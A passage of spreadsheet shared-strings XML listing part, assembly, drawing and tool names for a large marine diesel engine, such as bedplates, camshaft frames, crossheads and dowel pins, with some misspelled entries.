    <t>ARR.OF CONTROL EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF GOVERNOR BOOSTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF HOLDING DOWN BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF INDICATOR VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF OUTLET PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF REVERSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF HOLDING DOWN BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF TORSIOGRPH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS.OF CHAIN TIGHTENER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLING FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">ASSEMBLY OF END CHOCK BOLT </t>
  </si>
  <si>
    <t>ASSY OF COVERNOR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF REGULATING SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ATOMIZER-BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ATOMIZER-DRILLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUXILIARY BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AXIAL BEARING WITH BALLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BAKELITE BALLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL COCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL JOINTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALBE WITH ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BAND STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASEPLATE*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BBC TC CLEAN.PIPES(WATER)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING COMPLETS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING PEDESTAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING SHELL-CRANKPIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE DRAIN PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-INTERMEDIATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BELT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEVEL GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK-FUEL CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOWER BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOWER PERFORMANCE CURVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BODY F.NON RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BODY FOR NON RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">BOOSTER ACCUMULATOR </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOSS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOSS F.THERM.TEST COCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOSS WITH SRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOTTOM PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOX AND KEY SET,COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOX FOR PNEUMATIC COMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR CHANGE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET -LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET-SUPPORT OF X-HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BURSTING DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING WITH WHITE METAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTT-STRAP STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUZZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BY-PASS PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BY-PASS VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE TRAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAM*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSH.FRAME FORM+POS.TOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSH.FRAME INTERM.SECT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT FRAME FRONT SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT FRAM REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT FRAME TOP VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT LUB.OIL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT-COMPLETS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT-SECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAP NUT-ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CASTLE AND SLOTTED NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRE OF GRAVITY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN ASSEMBLING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN CASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DISASSEMBLING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN TACKLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WHEEL COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WHEEL-CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHARGING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHECK PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHEQUER PLATE(5MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMP FOR WIRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMP*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMPING BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN STUFF BOX OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN STUFF.B.OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLIP 20MM, COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLIP 20MM,COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLIP 30MM,COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLOSING DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COATING INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLCK WITH 3-WAY PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR RING FOR CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR RING FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR RING,STUFFING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR-HALA FOR CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBINATION SPANNERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBINATION WRENCHES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBINATION WRENCHS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPONENTS ON ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPONENTS ON ENGINE*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONE PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONE RING,PNEUM.PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONE*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL RING 2/2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL VALVE ANGLE-WAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL VALCE-ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.BLOCK,90 DEG.BORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION EL.COMPONENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTIONS FOR SUPPLEMENTARY SIGNAL EQ</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTACT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTR.EQUIPM.F.AUX.BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL LAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.ELEM.-STRAIGHT TUBES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W.PIPE-AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL.W.PIPE-TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER BOX+PIPES,REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING JACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING JACKET+CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER COLL.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER PIPES-A.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COORDINATE DIMENSIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COPPER PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CORR.TO TELEGRAGH ORDERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUNTER NUTS F.PULL RODS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUNTERWEIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUPLING F.MANOMETER,M/F</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUPLING FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUPLING NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER FOR STUFF.BOX HOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER WITHOUT HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER.SLOT IN X-HEAD CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKCASE COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKPIN BEARING CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSH.+THRUST BRG.TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS BAR F.CYL LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD BEAR.LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD BEAR.UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD BEARING CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSPIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROWFOOT WRENCH HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT.PLAN/PL. LIST-BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT.PLAN/PL.LIST-BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT.TOOL-SEAT-DISTR.PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTT.TOOL-F.OIL PIPE+SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTER FOR FUEL OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTER SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTER/REYNOLD CHAINS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.DOWEL PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.DOWEL PINS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.DOWELS,THREAD HOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.DOWELS,THREADED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.DOWELS,THREADED HOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.FRAME BOTTOM VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.FRAME CAMSHAFT SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.FRAME INTERM. SECT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.FRAME INTERM.SECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.LUB.OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.LUB.OIL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.STOP PINS,LOW HEADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.STOP PINS.LOW HEADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER.TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER FRAME APT END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER FRAME COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER FRAME FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER FRAME REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER FRAME TOP VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LUB.OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER UNIT COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DEAD CENTRE POINTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DEAD SLOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">DEEDISHED HEAD </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DEEP DISHED HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DESCRIPT.ENG.CONTROL SYST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM OF MANOEUVR.SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAL GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC EDGED WITH HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC EDGED WITH INCISION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC WITH INCISION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC WITH INSIDE RECESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC WITH RECESSES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC,PLAIN-EDGED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC-EDGED WITH HOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC-EDGED WITH RECESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC-PLAIN-EDGED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC-ROUND-CHAMFERED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC-SPECIAL*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISENGAGING SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISK HANDWHEELS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISM.LEVER FOR FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISM.TOOL,MAIN BRG SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTOR HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN CYLINDRICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN-CYL. WITH TAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN-CYL.WITH TAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN-CYLINDRICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PPE-AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN SCAVENGING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAINPIPE-SCAV.AIR.RECEIV</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAWING TOOL-TRAVERSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIVE ADAPTOR-REDUCING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIVING PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRY CLEANING TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DUMMY,FUEL VALVE JET TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EARTHING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRICAL DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRODE-ALLOY 50</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EMERGENCY CONSOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END CLEARANGE-CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END MILL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END STOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END WALL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE COOLING,FRESHWATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE COOLING,SEAWATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE GALLERY ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE INSTRUMENTATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE PAINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE ROOM HEIGHT,WEIGHT AND CAPACITY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE SEATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE SPEED CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINEERS SPAN'S,S.HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
